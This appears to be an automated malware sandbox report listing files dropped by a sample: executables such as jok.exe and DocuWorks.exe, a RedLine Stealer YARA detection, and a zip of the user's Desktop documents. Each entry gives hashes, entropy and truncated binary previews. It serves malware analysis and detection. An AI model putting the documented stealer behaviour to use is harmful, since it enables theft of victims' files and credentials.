Size (bytes):	393912
Entropy (8bit):	7.960129848185734
Encrypted:	false
SSDEEP:	6144:F9b8+wW/Wco9GZbOHqYCGwYyX9Y1J3yVA3Upzm88TKmIImK4E7AjEwYM/vYZu6Yj:Tb8+/hbOHsG46Xx6mWIFNOYM/h8cvB
MD5:	3170AED3EB44BD638CCE6F67650D4B50
SHA1:	22519AFD371ED56FE6B4B4565534E09D0DD20453
SHA-256:	D562B3B44859F761645676E0C0E7DAAD1226C5B90F53B4FE5E5395BF77454EC7
SHA-512:	7E7C6289DE619D06A7CA36FDB11D3D1A04E0913DFFCFABAC7AF71213E2E8C54BB367ECF318B07E40B8734D3A7DB92CB5DE6F73E99CAA9C254EEC876130C93F36
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....G.f.........."...0.dV............... ....@...... ....................................`..........................................................................................u............................................................... ..H............text...dV... ...X.................. ..`.rsrc................Z..............@..@........................................H........2...C......+...................................................H.........(....:.(......}....>...{.... ...._2.\|....(....6.\|.....(....&...(....... ...._T.. ...._..cT... ...._...R.~............~............~..............(....(......(....(......(....(...."..(....*...( ...&..{....,.ro..p......%.r...p.(....s>...zB.....("........v..{....o?...2...{.....o@...V(4....!s.....!o....&..(......(....6(2...&(3...&..(.......0.............{...... ...._. ...._..cY.0..

C:\Users\user\AppData\Local\Temp\1001107001\jok.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.0817932970004
Encrypted:	false
SSDEEP:	3072:uq6EgY6i4rUjhYMLwPcologL/ejZWTACtAti0lcZqf7D34leqiOLibBOp:VqY6inwPDpKZWTA+AplcZqf7DIvL
MD5:	8510BCF5BC264C70180ABE78298E4D5B
SHA1:	2C3A2A85D129B0D750ED146D1D4E4D6274623E28
SHA-256:	096220045877E456EDFEA1ADCD5BF1EFD332665EF073C6D1E9474C84CA5433F6
SHA-512:	5FF0A47F9E14E22FC76D41910B2986605376605913173D8AD83D29D85EB79B679459E2723A6AD17BC3C3B8C9B359E2BE7348EE1C21FA2E8CEB7CC9220515258D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)v................0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1001108001\swiiii.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	162304
Entropy (8bit):	7.967195699444992
Encrypted:	false
SSDEEP:	3072:I1lmOH349skOxH49PsH+8KqnuHV7A/5S+c6wABA47PN/6wHFHJ:I1iekOxYlI+EuH2cvAe4BywlH
MD5:	586F7FECACD49ADAB650FAE36E2DB994
SHA1:	35D9FB512A8161CE867812633F0A43B042F9A5E6
SHA-256:	CF88D499C83DA613AD5CCD8805822901BDC3A12EB9B15804AEFF8C53DC05FC4E
SHA-512:	A44A2C99D18509681505CF70A251BAF2558030A8648D9C621ACC72FAFCB2F744E3EF664DFD0229BAF7C78FB72E69F5D644C755DED4060DCAFA7F711D70E94772
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....G..........."...0..p...........4... ........@.. ....................................`.................................74..O....................................3..8............................................ ............... ..H............text...Po... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B................k4......H........$.................................................................]*....0............i.s........+...o.......X.... ....2..o.......o........8.........-N....d....(......(....&s..........o.........o...........o....r...p(.....3....+.s....%.o....%.o....%.o....%.o....%.o....%.o....%.Lo....%.o....%.o....%.o....%o.....Yo.........+........(...........o....+....2...X.. ....?........+<. ....... ...............XX.. ....].......................X.. ....2........8.......+w..X ....].

C:\Users\user\AppData\Local\Temp\1001142001\DocuWorks.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9374208
Entropy (8bit):	6.341144378360357
Encrypted:	false
SSDEEP:	49152:UJfUsBjuiwj8R2L0SZEGpG0bHMrpZWHyQiyz6y26vDNhsx8dJPxTtja25EHZKeqT:c9KiwgRu09ZWHyQi1yRBEHZ7xUnne8
MD5:	A4AC2EDDA7280DFABFC0E168AD4A0F71
SHA1:	C545CD8C7801F480EA3F311D7AB2FE8B79B8C85B
SHA-256:	EC0949BA67AFA666619EE7906753C470ADAAC94331F67A9D968405C57F3474D4
SHA-512:	915F40C008695D1ECB656E6A54EC79F8A69EFF42B9A33F5060A0EC0B58B80F3493773E229A9DC10855CE457B8AB138B4750541FCCF4EB1196ACA792943BDECD8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..;...... .............@.........................................`... .........................................N.......X.......,.......h{.........................................`..(.......................X............................text.....;.......;.................`.``.data........@;......2;.............@.`..rdata....I...A...I...A.............@.`@.pdata..h{.......\|.................@.0@.xdata..P....`.......B..............@.0@.bss.... ....p........................`..edata..N............P..............@.0@.idata..X............R..............@.0..CRT....p............h..............@.@..tls................j..............@.@..rsrc...,............l..............@.0..reloc.............................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\1001152001\DocuWorks.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9374208
Entropy (8bit):	6.341144378360357
Encrypted:	false
SSDEEP:	49152:UJfUsBjuiwj8R2L0SZEGpG0bHMrpZWHyQiyz6y26vDNhsx8dJPxTtja25EHZKeqT:c9KiwgRu09ZWHyQi1yRBEHZ7xUnne8
MD5:	A4AC2EDDA7280DFABFC0E168AD4A0F71
SHA1:	C545CD8C7801F480EA3F311D7AB2FE8B79B8C85B
SHA-256:	EC0949BA67AFA666619EE7906753C470ADAAC94331F67A9D968405C57F3474D4
SHA-512:	915F40C008695D1ECB656E6A54EC79F8A69EFF42B9A33F5060A0EC0B58B80F3493773E229A9DC10855CE457B8AB138B4750541FCCF4EB1196ACA792943BDECD8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..;...... .............@.........................................`... .........................................N.......X.......,.......h{.........................................`..(.......................X............................text.....;.......;.................`.``.data........@;......2;.............@.`..rdata....I...A...I...A.............@.`@.pdata..h{.......\|.................@.0@.xdata..P....`.......B..............@.0@.bss.... ....p........................`..edata..N............P..............@.0@.idata..X............R..............@.0..CRT....p............h..............@.@..tls................j..............@.@..rsrc...,............l..............@.0..reloc.............................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	4612
Entropy (8bit):	7.793656317208344
Encrypted:	false
SSDEEP:	96:eW0S8j36k9iZBVqn8iUFCBVqn8iUFXCw3PxAijeV6jxQfMpKU:1U/0w6Fr6FXdxAinQE
MD5:	9EE94D6222AC2FD09F6EE9262F2EA19D
SHA1:	66858B2E0F70CC353505155478AB8BABEC29684A
SHA-256:	99082782D8BB92C267DC63861B3FE3D02F2E6254DD790B55A133CD70CCD6C021
SHA-512:	CF25DF9468E51F8D6E6805DD5670BF67F5CCD0E5388F35416FB8EF9E2EF44A7D53F0940A1BB13928AFB5FE88AF3C7E75D80925F3282DAE31BBFE9EAC8823916B
Malicious:	true
Reputation:	unknown
Preview:	PK.........EEW..d)............_Files_\GAOBCVIQIJ.xlsx...E1.E.#...9`....!.. t..AE...h`...RXj...s~\......f.mv.v#.-U...;..yy..%....n(.d>........p......e.1....JG.65o..AK.B.y.)g.DJ..7..\|......{......,JU]FX.P0n-...r.. .A.].e.J..3.l[.....N.{..v....T...8....\M.,..?...yc...[X.f.So....?8....R.C.x..q.V.....A.K...eW.9z.6W..U2.4Z-.\|.G.J.n5.t.P..&..."..d>[.l..O.<..&..[.T..G...Fur..;_....g...8.'...%C....z.....SaS>.......p..<.m...!..M.'/.....k7.3.t.~...;...:.K..Zv4..s[.^x.;.e.Gg..}.C7......;..7.K.Zn...};.n......f..1$.f}.X9.G2f.`..=a.`....RT9.......t...W.Ng..:.~DT..'\|..:.......x..........C.Y..y.T....,>...T\....I...S...R.q9g.q+IM.o...J..il.>.F.s....S...}D..=./.S..k....?PK.........EEW,.............._Files_\IPKGELNTQY.docx..In.1....(c.}.........T...........(.k.h....$.$...[..Z.u[RLbK1A.v..l.ae{m=3RPLR..n.....I..b...,.)........K... O..2;...;.5.+G..V.QP...3.+b....=..+..^.TM.z...4...^...V...9.f.v.,.WW... .3."....28D.E......;.4...&.j......q.z..k.d....

C:\Users\user\AppData\Local\Temp\Tmp3775.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001107001\jok.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp3776.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001107001\jok.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpBCE6.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\configurationValue\propro.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpBD35.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\configurationValue\propro.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\_Files_\GAOBCVIQIJ.xlsx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Reputation:	unknown
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\Temp\_Files_\IPKGELNTQY.docx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Reputation:	unknown
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\Temp\_Files_\IPKGELNTQY.xlsx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Reputation:	unknown
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\Temp\_Files_\LSBIHQFDVT.xlsx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Reputation:	unknown
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\Temp\_Files_\NEBFQQYWPS.docx

Download File

Process:	C:\Windows\System32\rundll32.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
